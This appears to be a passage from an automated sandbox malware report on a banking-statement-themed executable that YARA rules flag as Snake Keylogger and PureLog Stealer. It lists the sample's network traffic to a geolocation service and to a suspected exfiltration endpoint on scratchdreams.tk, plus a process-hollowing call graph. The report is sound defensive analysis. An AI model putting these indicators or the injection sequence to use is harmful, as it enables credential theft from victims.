                                                            2024-05-02 09:54:59 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549719172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:55:00 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:55:00 UTC706INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:00 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14584
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSuqTy18t0dWcFVLTHuexjBFtJjZK49LF0LTVuppKT7XzjRh8cmPlO4tDIxRhkdNvhLQ5Wd9%2FvN9PoArWbCdQtwec7TGbo3KeyTIQWLxgNiUdn4tH1q9o%2FZVgbgtcbK6sqb7MBbZ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d72218fcc343a3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:00 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:55:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549721172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:55:04 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:55:04 UTC700INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:04 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14588
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngCvVCNRH96VG8ovf4to1DBQDCuAa2EVnfwXuZHfraofkZDxmRmTN3omRWRRdFyuAThNfvnutsT83s05AvDSCxUSjINWBwxBOxoeQzgQ3Bq5ljJjn1mtwREGrUTglKolE4RQYfCr"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d722338fe87d1a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:04 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:55:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549723172.67.177.1344436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:55:11 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-02 09:55:11 UTC704INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:11 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14595
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqTE9TB%2FDl5P4MrRfi8vbLIg1LdRvstWOAPDxpspCEqMWXpkVcEEraOTyMY9vrQlXqIWJVk3e2BfxxLXWXR4Vnr28MyvjnjCWjZowBr%2BOFoyj4j0gaPB1759FMPpKC5MLz4UFq5a"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d7225edfa14270-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:11 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:55:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549726104.21.27.854436052C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 09:55:12 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                            Host: scratchdreams.tk
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:55:47 UTC737INHTTP/1.1 522
                                                            Date: Thu, 02 May 2024 09:55:47 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 15
                                                            Connection: close
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDEb%2FtHtsURGK2SUSrCw0D9oOsujuoWrKBo1Ba1I9YM1MQJLns4YamWO9wdFVlvEHPowkksd1PypE9Lql9SHxmkxatlCd664%2BK9BjSnW%2B%2FYKfnkmxW353mdcloY6WA1TNw9R"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 87d72262aebf43a9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:47 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                            Data Ascii: error code: 522


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:11:54:50
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                                                            Imagebase:0x300000
                                                            File size:877'056 bytes
                                                            MD5 hash:42199F4A8E3D9FE6CE26A7D4922AFEC7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1980117407.0000000002813000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:11:54:52
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                                                            Imagebase:0x5a0000
                                                            File size:877'056 bytes
                                                            MD5 hash:42199F4A8E3D9FE6CE26A7D4922AFEC7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:204
                                                              Total number of Limit Nodes:15
                                                              execution_graph 22990 2703180 22991 270330b 22990->22991 22992 27031a6 22990->22992 22992->22991 22994 2702d78 22992->22994 22995 2703400 PostMessageW 22994->22995 22996 270346c 22995->22996 22996->22992 22954 255acd0 22958 255adb9 22954->22958 22966 255adc8 22954->22966 22955 255acdf 22959 255adbc 22958->22959 22960 255ad60 22959->22960 22974 255b051 22959->22974 22978 255b060 22959->22978 22960->22955 22961 255adf4 22961->22960 22962 255b000 GetModuleHandleW 22961->22962 22963 255b02d 22962->22963 22963->22955 22967 255adfc 22966->22967 22968 255add9 22966->22968 22967->22955 22968->22967 22972 255b051 LoadLibraryExW 22968->22972 22973 255b060 LoadLibraryExW 22968->22973 22969 255adf4 22969->22967 22970 255b000 GetModuleHandleW 22969->22970 22971 255b02d 22970->22971 22971->22955 22972->22969 22973->22969 22975 255b054 22974->22975 22976 255b099 22975->22976 22982 255a168 22975->22982 22976->22961 22979 255b062 22978->22979 22980 255a168 LoadLibraryExW 22979->22980 22981 255b099 22979->22981 22980->22981 22981->22961 22983 255b240 LoadLibraryExW 22982->22983 22985 255b2b9 22983->22985 22985->22976 22988 255d6b0 DuplicateHandle 22989 255d746 22988->22989 22997 2701385 23001 2701bc8 22997->23001 23023 2701bb8 22997->23023 22998 27012fe 23002 2701be2 23001->23002 23045 2702178 23002->23045 23050 2702014 23002->23050 23054 27022d4 23002->23054 23059 27021b4 23002->23059 23065 2701f93 23002->23065 23070 27022ee 23002->23070 23075 27024ac 23002->23075 23080 270274c 23002->23080 23086 270218c 23002->23086 23091 270240b 23002->23091 23095 2702388 23002->23095 23100 2702227 23002->23100 23104 27023c7 23002->23104 23109 2702125 23002->23109 23114 2702263 23002->23114 23119 27023a3 23002->23119 23124 2702400 23002->23124 23129 27029de 23002->23129 23134 270215a 23002->23134 23003 2701c06 23003->22998 23024 2701be2 23023->23024 23026 2701f93 2 API calls 23024->23026 23027 27021b4 2 API calls 23024->23027 23028 27022d4 2 API calls 23024->23028 23029 2702014 2 API calls 23024->23029 23030 2702178 2 API calls 23024->23030 23031 270215a 2 API calls 23024->23031 23032 27029de 2 API calls 23024->23032 23033 2702400 2 API calls 23024->23033 23034 27023a3 2 API calls 23024->23034 23035 2702263 2 API calls 23024->23035 23036 2702125 2 API calls 23024->23036 23037 27023c7 2 API calls 23024->23037 23038 2702227 2 API calls 23024->23038 23039 2702388 2 API calls 23024->23039 23040 270240b 2 API calls 23024->23040 23041 270218c 2 API calls 23024->23041 23042 270274c 2 API calls 23024->23042 23043 27024ac 2 API calls 23024->23043 23044 27022ee 2 API calls 23024->23044 23025 2701c06 23025->22998 23026->23025 23027->23025 23028->23025 23029->23025 23030->23025 23031->23025 23032->23025 23033->23025 23034->23025 23035->23025 23036->23025 23037->23025 23038->23025 23039->23025 23040->23025 23041->23025 23042->23025 23043->23025 23044->23025 23046 2702185 23045->23046 23047 27029e1 23046->23047 23139 2700b00 23046->23139 23143 2700b08 23046->23143 23147 2700d90 23050->23147 23151 2700d84 23050->23151 23055 27022da 23054->23055 23155 27008c0 23055->23155 23159 27008b9 23055->23159 23056 2702a17 23060 27021bb 23059->23060 23061 2702182 23059->23061 23060->23060 23062 27029e1 23061->23062 23063 2700b00 WriteProcessMemory 23061->23063 23064 2700b08 WriteProcessMemory 23061->23064 23063->23061 23064->23061 23066 2701fb8 23065->23066 23067 270204f 23066->23067 23068 2700d90 CreateProcessA 23066->23068 23069 2700d84 CreateProcessA 23066->23069 23067->23067 23068->23067 23069->23067 23071 2702171 23070->23071 23073 27008c0 ResumeThread 23071->23073 23074 27008b9 ResumeThread 23071->23074 23072 2702a17 23072->23072 23073->23072 23074->23072 23076 2702262 23075->23076 23078 27008c0 ResumeThread 23076->23078 23079 27008b9 ResumeThread 23076->23079 23077 2702a17 23078->23077 23079->23077 23081 27026df 23080->23081 23082 270274f 23080->23082 23163 2700970 23081->23163 23167 2700969 23081->23167 23083 27026e4 23083->23003 23087 27026c9 23086->23087 23089 2700970 Wow64SetThreadContext 23087->23089 23090 2700969 Wow64SetThreadContext 23087->23090 23088 27026e4 23088->23003 23089->23088 23090->23088 23093 2700b00 WriteProcessMemory 23091->23093 23094 2700b08 WriteProcessMemory 23091->23094 23092 270242f 23093->23092 23094->23092 23096 270213c 23095->23096 23171 2700bf0 23096->23171 23175 2700bf8 23096->23175 23097 2702a58 23101 2702237 23100->23101 23102 2700b00 WriteProcessMemory 23101->23102 23103 2700b08 WriteProcessMemory 23101->23103 23102->23101 23103->23101 23105 27023d3 23104->23105 23107 2700970 Wow64SetThreadContext 23105->23107 23108 2700969 Wow64SetThreadContext 23105->23108 23106 27023e1 23107->23106 23108->23106 23110 270212b 23109->23110 23112 2700bf0 ReadProcessMemory 23110->23112 23113 2700bf8 ReadProcessMemory 23110->23113 23111 2702a58 23112->23111 23113->23111 23115 270227d 23114->23115 23117 27008c0 ResumeThread 23115->23117 23118 27008b9 ResumeThread 23115->23118 23116 2702a17 23117->23116 23118->23116 23120 27023a6 23119->23120 23122 2700970 Wow64SetThreadContext 23120->23122 23123 2700969 Wow64SetThreadContext 23120->23123 23121 27023e1 23122->23121 23123->23121 23125 2702636 23124->23125 23179 2700a41 23125->23179 23183 2700a48 23125->23183 23126 270207a 23126->23003 23130 2702971 23129->23130 23131 27029e1 23129->23131 23130->23129 23132 2700b00 WriteProcessMemory 23130->23132 23133 2700b08 WriteProcessMemory 23130->23133 23132->23130 23133->23130 23135 2702160 23134->23135 23137 27008c0 ResumeThread 23135->23137 23138 27008b9 ResumeThread 23135->23138 23136 2702a17 23137->23136 23138->23136 23140 2700b08 WriteProcessMemory 23139->23140 23142 2700ba7 23140->23142 23142->23046 23144 2700b50 WriteProcessMemory 23143->23144 23146 2700ba7 23144->23146 23146->23046 23148 2700e19 CreateProcessA 23147->23148 23150 2700fdb 23148->23150 23152 2700d90 CreateProcessA 23151->23152 23154 2700fdb 23152->23154 23156 2700900 ResumeThread 23155->23156 23158 2700931 23156->23158 23158->23056 23160 27008c0 ResumeThread 23159->23160 23162 2700931 23160->23162 23162->23056 23164 27009b5 Wow64SetThreadContext 23163->23164 23166 27009fd 23164->23166 23166->23083 23168 2700970 Wow64SetThreadContext 23167->23168 23170 27009fd 23168->23170 23170->23083 23172 2700c43 ReadProcessMemory 23171->23172 23174 2700c87 23172->23174 23174->23097 23176 2700c43 ReadProcessMemory 23175->23176 23178 2700c87 23176->23178 23178->23097 23180 2700a48 VirtualAllocEx 23179->23180 23182 2700ac5 23180->23182 23182->23126 23184 2700a88 VirtualAllocEx 23183->23184 23186 2700ac5 23184->23186 23186->23126 22986 2705178 FindCloseChangeNotification 22987 27051df 22986->22987 23187 2554668 23188 255467a 23187->23188 23189 2554686 23188->23189 23191 2554778 23188->23191 23192 255477c 23191->23192 23196 2554879 23192->23196 23200 2554888 23192->23200 23198 255487c 23196->23198 23197 255498c 23197->23197 23198->23197 23204 25544d4 23198->23204 23201 255488a 23200->23201 23202 255498c 23201->23202 23203 25544d4 CreateActCtxA 23201->23203 23203->23202 23205 2555918 CreateActCtxA 23204->23205 23207 25559db 23205->23207 23208 255d468 23209 255d4ae GetCurrentProcess 23208->23209 23211 255d500 GetCurrentThread 23209->23211 23212 255d4f9 23209->23212 23213 255d536 23211->23213 23214 255d53d GetCurrentProcess 23211->23214 23212->23211 23213->23214 23215 255d573 23214->23215 23216 255d59b GetCurrentThreadId 23215->23216 23217 255d5cc 23216->23217

                                                              Executed Functions

                                                              Function 027040AA Relevance: .4, Instructions: 405COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d8645b1fab4622a995265d4191348d54e6b7a11b22a52743923c149f7c8a8a6
                                                              • Instruction ID: b97453a4541fb19291b01defad9e36ad3f79dce0796dcb6bb4bc6778f6b93529
                                                              • Opcode Fuzzy Hash: 7d8645b1fab4622a995265d4191348d54e6b7a11b22a52743923c149f7c8a8a6
                                                              • Instruction Fuzzy Hash: 3DE1AA707016148FDB29DB75D4A0BAEB7FBAFC9704F2445AED6469B290CB30E809CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4C1E0 Relevance: .2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2398e7be5c2a8e06aec64ebe93b47113f7eb7bdd0abd94ca113f3347bd3f546
                                                              • Instruction ID: 7e059b800d9a172d8abdb32deeaf490ce17b6ae192dd3a1b17f60ea1169e84b3
                                                              • Opcode Fuzzy Hash: b2398e7be5c2a8e06aec64ebe93b47113f7eb7bdd0abd94ca113f3347bd3f546
                                                              • Instruction Fuzzy Hash: B651C3B4E061199FCB44DFAAD5849AEFBF2BF89300F14D126E409A7315DB30A942CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255D458 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 295 255d458-255d45a 296 255d45c 295->296 297 255d45e-255d462 295->297 296->297 298 255d464-255d465 297->298 299 255d466-255d4f7 GetCurrentProcess 297->299 298->299 303 255d500-255d534 GetCurrentThread 299->303 304 255d4f9-255d4ff 299->304 305 255d536-255d53c 303->305 306 255d53d-255d571 GetCurrentProcess 303->306 304->303 305->306 307 255d573-255d579 306->307 308 255d57a-255d595 call 255d638 306->308 307->308 312 255d59b-255d5ca GetCurrentThreadId 308->312 313 255d5d3-255d635 312->313 314 255d5cc-255d5d2 312->314 314->313
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D4E6
                                                              • GetCurrentThread.KERNEL32 ref: 0255D523
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D560
                                                              • GetCurrentThreadId.KERNEL32 ref: 0255D5B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: e089906f78957144388c59078e20413c24a23bef55726012c8579d57ca04ada9
                                                              • Instruction ID: 7fd6f61f87fbe8ea6cfc3d5400ced693f76212c9a0b32e5fd520d23f6f77ca06
                                                              • Opcode Fuzzy Hash: e089906f78957144388c59078e20413c24a23bef55726012c8579d57ca04ada9
                                                              • Instruction Fuzzy Hash: 4C5155B1D01319CFDB14CFA9D548B9EBFF1BB48308F24849AE409A72A0D7745984CB6A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255D468 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 321 255d468-255d4f7 GetCurrentProcess 325 255d500-255d534 GetCurrentThread 321->325 326 255d4f9-255d4ff 321->326 327 255d536-255d53c 325->327 328 255d53d-255d571 GetCurrentProcess 325->328 326->325 327->328 329 255d573-255d579 328->329 330 255d57a-255d595 call 255d638 328->330 329->330 334 255d59b-255d5ca GetCurrentThreadId 330->334 335 255d5d3-255d635 334->335 336 255d5cc-255d5d2 334->336 336->335
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D4E6
                                                              • GetCurrentThread.KERNEL32 ref: 0255D523
                                                              • GetCurrentProcess.KERNEL32 ref: 0255D560
                                                              • GetCurrentThreadId.KERNEL32 ref: 0255D5B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 438f299c5760d015e037a3cbfcaf0d01ed5e918231a45d29c8474f82422cecfb
                                                              • Instruction ID: f044c1ae7bd8b1ab3c62c2d02cfbb0cbd53ee3defb14dcfaa45a2de665cc5dbb
                                                              • Opcode Fuzzy Hash: 438f299c5760d015e037a3cbfcaf0d01ed5e918231a45d29c8474f82422cecfb
                                                              • Instruction Fuzzy Hash: DF5136B1D01319CFDB14DFA9D548B9EBBF1FB48318F208459E409A73A0D7749984CB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

